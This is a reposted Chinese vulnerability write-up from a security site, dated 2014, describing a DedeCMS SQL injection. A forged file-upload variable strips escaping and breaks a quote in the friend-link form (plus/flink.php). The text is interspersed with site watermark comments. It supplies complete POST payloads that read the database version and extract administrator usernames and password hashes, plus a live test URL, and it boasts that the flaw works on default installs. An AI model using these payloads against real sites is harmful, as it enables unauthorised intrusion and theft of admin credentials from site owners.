安云网 - AnYun.ORG | 专注于网络信息收集、网络数据分享、网络安全研究、网络各种猎奇八卦。
当前位置: 安云网 > 技术关注 > WEB安全 > DedeCMS全版本通杀SQL注入(真正的无任何限制附官方测试结果)

DedeCMS全版本通杀SQL注入(真正的无任何限制附官方测试结果)

时间:2014-09-10来源:WOOYUN 作者: kobin97点击:
DedeCMS全版本通杀SQL注入(真正的无任何限制附官方测试结果)

最近很多人刷dedecms的漏洞,个人表示很无语。
粗略看了下,这些洞存在太大限制 
一句话总结:只要会员中心一关,全部没法用...

//ANYUN.ORG

试问现在哪个傻子会开会员中心... 默认都是关闭的,所以哪...
今天这个洞,无视会员中心,无视GPC,会员中心,GPC你哪凉快 哪呆着去,默认安装就能利用哦...
也一句话总结:架构问题才是真问题。
//安云网,anyun.org


(ps:调皮一下^-^,felixk3y某见怪,话说这个漏洞跨越了多个版本,不知会不会打雷。) //copyright AnYun.ORG

//安云网咨询系统

首先,我们来看看dede重要文件 common.inc.php

这里开始过滤得很完整,往下看

//转换上传的文件相关的变量及安全处理、并引用前台通用的上传函数

//copyright AnYun.ORG

if($_FILES)
{
   require_once(DEDEINC.'/uploadsafe.inc.php');
}
//安云网咨询系统





我看再看:uploadsafe.inc.php

//本文来自安云网

//29行
   $$_key = $_FILES[$_key]['tmp_name'] = str_replace("\\\\", "\\", $_FILES[$_key]['tmp_name']);
//安云网,anyun.org



看到这里,我笑了。

这不是能绕过 GPC的节奏么。



好吧,随便找一个能添加数据的地方

于是找到了

plus\flink.php

虽然都经过 htmlspecialchars 
//内容来自安云网
我们看看:

htmlspecialchars(string,quotestyle,character-set)

可选。规定如何编码单引号和双引号。

ENT_COMPAT - 默认。仅编码双引号。
ENT_QUOTES - 编码双引号和单引号。
ENT_NOQUOTES - 不编码任何引号。
默认情况下仅编码双引号。

这里不是重点,不过也是能利用的条件之一,用于绕过dede自带的ids。
构造webname 值为:

//安云网,anyun.org

&_FILES[webname][name]=1.gif&_FILES[webname][type]=image/gifx&_FILES[webname][size]=10&&_FILES[webname][tmp_name]=pass\ //内容来自AnYun.ORG 


这里解释一下,经过GPC后 webname 变为 pass\\

经过刚才 uploadsafe.inc.php 的函数后 

webname 变为 pass\

插入到SQL语句中就变成了

//内容来自AnYun.ORG

INSERT INTO `dede_flink`(sortrank,url,webname,logo,msg,email,typeid,dtime,ischeck) VALUES('50','http://','pass\',' 
//内容来自AnYun.ORG



即吃掉了后面的 ' ,从而实现绕过GPC。

不过ExecuteNoneQuery不支持错误回显,那我们就构造好,让他显示出来吧。于是后面的logo函数就变成:

logo=,if(@`'`,0x7c,(select version())),1,1,1,1,1)#,@`'`



ischeck 为1即绕过审核,结果直接显示出来。

//安云网,anyun.org

完整参数为:

查版本:

//ANYUN.ORG

Submit=%20%E6%8F%90%20%E4%BA%A4%20&dopost=save&email=&logo=,if(@`'`,0x7c,(select version())),1,1,1,1,1)#,@`'`&typeid=1&url=http%3A%2F%2F&validate=spen&_FILES[webname][name]=1.gif&_FILES[webname][type]=image/gifx&_FILES[webname][size]=10&&_FILES[webname][tmp_name]=pass\ 

//安云网,anyun.org


查密码:

//安云网,anyun.org

Submit=%20%E6%8F%90%20%E4%BA%A4%20&dopost=save&email=&logo=,if(@`'`,0x7c,(select concat(userid,0x7c,pwd) from dede_admin limit 0,1)),1,1,1,1,1)#,@`'`&typeid=1&url=http%3A%2F%2F&validate=spen&_FILES[webname][name]=1.gif&_FILES[webname][type]=image/gifx&_FILES[webname][size]=10&&_FILES[webname][tmp_name]=pass\ 

//ANYUN.ORG



验证码字段自己修改。。。 //本文来自安云网

//copyright AnYun.ORG

1.jpg

//ANYUN.ORG



//内容来自AnYun.ORG

2.jpg //copyright AnYun.ORG





官方测试地址:

http://help.dedecms.com/plus/flink.php

//内容来自安云网

111.jpg //本文来自安云网

漏洞信息:http://wooyun.org/bugs/wooyun-2014-051950

//copyright AnYun.ORG


//ANYUN.ORG

顶一下
(0)
0%
踩一下
(0)
0%
------分隔线----------------------------
发表评论
请自觉遵守互联网相关的政策法规,严禁发布色情、暴力、反动的言论。
评价:
验证码: 点击我更换图片
相关内容
推荐内容